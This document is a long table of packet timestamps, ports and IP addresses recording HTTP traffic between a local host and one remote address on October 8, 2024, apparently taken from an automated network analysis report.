                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.834714890 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.834747076 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.834764004 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835377932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835396051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835407019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835417032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835432053 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835448027 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835475922 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835578918 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.835613966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.837899923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.837944984 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.837955952 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.837968111 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.837992907 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838079929 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838092089 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838102102 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838126898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838140011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838144064 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838150978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838161945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838166952 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838198900 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838630915 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838643074 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838654995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838680983 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838825941 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838866949 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838875055 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838886023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.838926077 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839009047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839020967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839030981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839040995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839055061 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839066982 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839236021 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839260101 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839274883 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839286089 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839296103 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839304924 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839307070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839318037 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839329004 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839329958 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839340925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839366913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839648008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839665890 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839678049 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839685917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839701891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839715004 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839734077 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839745998 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839775085 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839874029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839884996 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839895964 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839907885 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839921951 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839940071 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.839989901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840001106 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840039015 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840137959 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840148926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840159893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840169907 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840181112 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840189934 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840192080 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840204000 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840207100 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840231895 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840389967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840401888 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840439081 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840539932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840557098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840568066 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840579033 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840589046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840600967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840610981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840611935 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840622902 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840630054 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840634108 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840643883 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840651989 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840653896 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840665102 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840671062 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840676069 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.840706110 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841110945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841150045 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841160059 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841162920 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841188908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841200113 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841353893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841363907 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841377974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841387987 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841392994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841398954 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841409922 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841411114 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841435909 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841789007 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841799974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841809988 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841820002 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841826916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841829062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841840029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841851950 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841861963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841866970 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841871977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841881990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841885090 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841892958 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841902018 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841906071 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841913939 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841923952 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841927052 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.841949940 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842228889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842240095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842251062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842289925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842360020 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842370987 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842381001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842410088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842489004 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842502117 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842544079 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842592001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842602015 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842612028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842617989 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842628956 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842641115 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842659950 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.842674017 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843071938 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843085051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843091011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843101025 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843111038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843118906 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843122005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843133926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843137980 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843144894 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843154907 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843159914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843166113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843177080 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843184948 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843187094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843197107 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843206882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843208075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843219042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843231916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843257904 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843592882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843605042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843616009 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843640089 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843734026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843744993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843755960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843767881 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843782902 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843813896 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843980074 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.843991995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844002008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844012976 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844023943 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844027042 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844034910 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844048977 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844049931 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844060898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844080925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844468117 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844480038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844490051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844501019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844511032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844522953 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844532013 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844532967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844543934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844553947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844562054 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844563961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844574928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844575882 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844598055 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844897032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844907999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844918013 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844923019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844929934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844934940 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844939947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844945908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844949961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844954967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844959974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844966888 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.844970942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845007896 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845019102 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845344067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845355034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845365047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845375061 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845405102 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845416069 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845568895 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845578909 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845594883 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845604897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845613956 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845623970 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845634937 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845637083 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845644951 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845662117 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845686913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.845876932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846029997 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846040010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846049070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846059084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846071005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846081972 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846097946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846102953 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846112013 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846122026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846132040 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846141100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846148014 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846152067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846162081 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846172094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846182108 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846193075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846193075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846201897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846211910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846213102 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846235991 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.846250057 CEST4917780192.168.2.22192.3.220.40
